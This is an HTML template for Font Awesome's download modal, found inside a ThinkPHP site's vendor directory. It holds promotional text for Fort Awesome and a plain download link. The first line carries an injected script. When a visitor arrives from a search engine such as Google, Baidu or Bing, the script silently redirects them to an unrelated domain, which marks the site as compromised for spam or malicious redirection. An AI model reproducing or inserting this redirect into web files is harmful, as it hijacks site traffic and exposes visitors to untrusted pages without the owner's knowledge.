d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\_includes\modals\download.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><div class="modal fade" id="modal-download" tabindex="-1" role="dialog" aria-labelledby="modal-download-label"
002:      xmlns="http://www.w3.org/1999/html">
003:   <div class="modal-dialog" role="document">
004:     <div class="modal-content">
005:       <div class="modal-header">
006:         <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="fa fa-times" aria-hidden="true"></i><span class="close"></span></button>
007:         <h2 class="modal-title" id="modal-download-label">
008:           <i class="fa fa-download fa-lg" aria-hidden="true"></i>&nbsp;
009:           Download
010:         </h2>
011:       </div>
012:       <div class="modal-body">
013:         <div class="text-lg margin-bottom-lg">
014:           Before you download, check out our latest project: Fort Awesome&mdash;
015:         </div>
016:
017:         <div class="row">
018:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
019:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">More Sets</h4>
020:             Font Awesome not the right look? We've got the perfect icon set for your website!
021:           </div>
022:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
023:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">Your Icons</h4>
024:             Copy &amp; paste your own logo and icons directly into Fort Awesome. Easy peasy.
025:           </div>
026:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
027:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">Fonts Too!</h4>
028:             Subset and serve your typefaces too! We've got some great ones to start with.
029:           </div>
030:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
031:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">Optimized</h4>
032:             Subsetting your icons and typefaces often shrinks them by 95% or more!
033:           </div>
034:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
035:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">Hosted</h4>
036:             No more messing with files! Update and deploy your icons to our CDN.
037:           </div>
038:           <div class="col-md-6 col-sm-6 margin-bottom-lg">
039:             <h4 class="page-header margin-top-none padding-bottom-sm margin-bottom-sm">Faster</h4>
040:             Optimized and hosted means your icons and typefaces load much faster.
041:           </div>
042:         </div>
043:
044:         <a href="https://fortawesome.com/start?utm_source=font_awesome_homepage&utm_medium=display&utm_content=download_modal&utm_campaign=promo_{{ site.fontawesome.minor_version }}_update" class="btn btn-success btn-lg btn-block">
045:           Take your icon game <br class="visible-xs" />to the next level with
046:           <h2 class="margin-top-sm margin-bottom-sm hidden-xs"><i class="fas fas-fort-logo fas-lg valign-baseline"></i>&nbsp; Fort Awesome</h2>
047:           <h3 class="margin-top-sm margin-bottom-sm visible-xs"><i class="fas fas-fort-logo fas-lg valign-baseline"></i>&nbsp; Fort Awesome</h3>
048:         </a>
049:         <div class="text-center margin-top-sm margin-bottom-sm">or</div>
050:         <a class="btn btn-default btn-lg btn-block" href="{{ page.relative_path }}assets/font-awesome-{{ site.fontawesome.version }}.zip"
051:            onClick="_gaq.push(['_trackEvent', 'Outbound Modal Link', 'Download on GitHub']);">
052:           No thanks, just download <br class="visible-xs" />Font Awesome
053:         </a>
054:
055:       </div>
056:     </div>
057:   </div>
058: </div>
059:
060:
061: